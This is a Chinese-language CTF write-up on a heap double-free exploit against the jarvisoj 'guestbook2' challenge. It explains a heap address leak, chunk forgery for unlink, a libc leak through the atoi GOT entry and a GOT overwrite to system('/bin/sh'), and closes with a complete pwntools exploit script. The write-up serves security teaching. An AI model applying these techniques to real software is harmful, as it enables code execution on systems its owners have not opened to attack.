Double Free浅析（泄露堆地址的一种方法）

Double Free其实就是同一个指针free两次。虽然一般把它叫做double free。其实只要是free一个指向堆内存的指针都有可能产生可以利用的漏洞。

double free的原理其实和堆溢出的原理差不多，都是通过unlink这个双向链表删除的宏来利用的。只是double free需要由自己来伪造整个chunk并且欺骗操作系统

所以好像和普通的堆溢出伪造chunk然后free触发unlink造成固定地址写，并进而造成任意地址读和任意地址写。

参考文章

我也不知道哪位大佬写的资料1

Linux堆漏洞之Double free 不要说话

jarvisoj Guestbook2          wooy0ung

拿jarvisoj上的一道guestbook2来作为例子。

0x00 泄露堆地址

首先涉及到关于unsorted bin的一些知识：

      unsorted bin 的队列使用 bins 数组的第一个，如果被用户释放的 chunk 大于 max_fast，或者 fast bins 中的空闲 chunk 合并后，这些 chunk 首先会被放到 unsorted bin 队列中。

      详细的可以阅读glibc内存管理ptmalloc2源码分析一文。

为了伪造chunk通过unlink的验证，我们需要找到一个指向堆地址的指针，之前写的unlink浅析里面有提到，程序功能常常使用一个chunk_list来存储所有malloc申请到的内存，那么chunk_list就可以作为我们指向堆地址的指针。这道题里则是先malloc一块大的内存作为chunk_list，所以我们需要先泄露得到chunk_list的地址，从而伪造chunk。

add（'a'）

add（'a'）

add（'a'）

add（'a'）

remove(0)

remove(2)

释放0号堆块时，由于其前后都不是空闲堆块所以不会发生合并，又因为大小为0x80所以会被放入unsorted bin当中，此时fd 和 bk都指向main arena中的一块区域，此时可以通过uaf泄露libc基址（可以参考UAF获取main_arena地址泄露libc基址，这道题没有采用此方法）；同样的，释放2号堆块时也不会发生合并，且被放入unsorted bin，并和0号堆块构成双向链表：

此时chunk0的bk是指向chunk2的，由于程序读取输入后没有在结尾加'\x00'之类的截断，这里可以通过：

add('12345678')

show()

新申请的’12345678‘将覆盖chunk0的fd，printf('%s')会连带着把后面的指向chunk2的bk也打印出来，完成堆地址的泄露。

因为是第2个堆块，所以：

heap_base=heap_addr - (0x80+0x10)*2 - (0x1810+0x10)

获得了heap_base之后我们就可以计算指向所有申请的chunk的指针，这里我们利用chunk0来进行unlink，其相对heap_base的偏移地址为0x30：

chunk_addr=heap_base+0x30

完成泄露后把所有的chunk都释放掉：

remove（0）

remove（1）

remove（3）

0x01 伪造chunk

现在的堆块状态：

1.首先在chunk0的data区域伪造presize、size、fd和bk，原理和布局同unlink

2.接着在chunk1的data区域添加0x80大小的paddings，溢出到chunk2的起始位置，伪造presize和size

伪造的堆块：

通过设置chunk0的size和chunk2的presize使得fake chunk0变成一个大小为0x80+0x90的大堆块，且作为chunk2的前一个堆块，通过设置chunk2的size使得fake chunk0看起来是空闲的。

chunk3和chunk4的作用是防止free（chunk2）时发生向前合并。

这样free（chunk2）时发生向后合并，执行unlink（fake chunk0），向chunk_addr的位置写入chunk_addr - 0x18

接着调用edit(0)将可控chunk_addr位置的8字节

0x02 leak libc & get shell

类似unlink的利用方法，向*（chunk_addr）写入0x18字节的paddings，接着将覆盖chunk_addr的内容，这里还要考虑到程序定义的结构体里的inuse位和note length，所以payload应为：

payload='a'*8+p64(1)+p64(8)+p64(e.got['atoi'])    #set inuse 1 , and set length 8

edit(0,payload)

紧接着show(0)将泄露出atoi的实际地址，从而leak libc基址

同样的:

edit(0 , p64(system_addr))

将把atoi的got表写入system的地址，然后在选择功能的时候输入'/bin'sh'，程序将会执行atoi('/bin/sh')，实际上就是执行了system('/bin/sh')

get shell!

附上exp：

---

from pwn import *

p=process('./guestbook2')

e=ELF('./guestbook2')

libc=ELF('./libc-2.25.so')

def add(data):

p.recvuntil('Your choice: ')

p.sendline('2')

p.recvuntil('Length of new post: ')

p.sendline(str(len(data)))

p.recvuntil('Enter your post: ')

p.send(data)

def show():

p.recvuntil('Your choice: ')

p.sendline('1')

def edit(index,data):

p.recvuntil('Your choice: ')

p.sendline('3')

p.recvuntil('Post number: ')

p.sendline(str(index))

p.recvuntil('Length of post: ')

p.sendline(str(len(data)))

p.recvuntil('Enter your post: ')

p.send(data)

def remove(index):

p.recvuntil('Your choice: ')

p.sendline('4')

p.recvuntil('Post number: ')

p.sendline(str(index))

add('a')

add('a')

add('a')

add('a')

remove(0)

remove(2)

add('12345678')

show()

p.recvuntil('12345678')

heap_addr=u64(p.recv(4).ljust(8,'\x00'))

heap_base=heap_addr-0x1810-0x10-0x120

chunk_addr=heap_base+0x30

print 'heap base address: ',hex(heap_base)

print 'chunk list address: ',hex(chunk_addr)

remove(0)

remove(1)

remove(3)

gdb.attach(p,'b* 0x400bc2')

size0 = 0x90+0x80

add(p64(0)+p64(size0+1)+p64(chunk_addr-0x18)+p64(chunk_addr-0x10))

add("a"*0x80+p64(size0)+p64(0x90)+"a"*0x80+(p64(0)+p64(0x91)+"a"*0x80)*2)

remove(2)

payload='a'*8+p64(1)+p64(8)+p64(e.got['atoi'])

edit(0,payload)

show()

p.recvuntil('0. ')

leak_addr=u64(p.recv(6).ljust(8,'\x00'))

print hex(leak_addr)

libc_base=leak_addr-libc.symbols['atoi']

system_addr=libc_base+libc.symbols['system']

print 'system_address: ',hex(system_addr)

#gdb.attach(p,'b* 0x400f7c')

edit(0,p64(system_addr))

p.recvuntil('Your choice: ')

p.sendline('/bin/sh')

p.interactive()

---

作者：BJChangAn
链接：https://www.jianshu.com/p/72177311e2ae
來源：简书
著作权归作者所有。商业转载请联系作者获得授权，非商业转载请注明出处。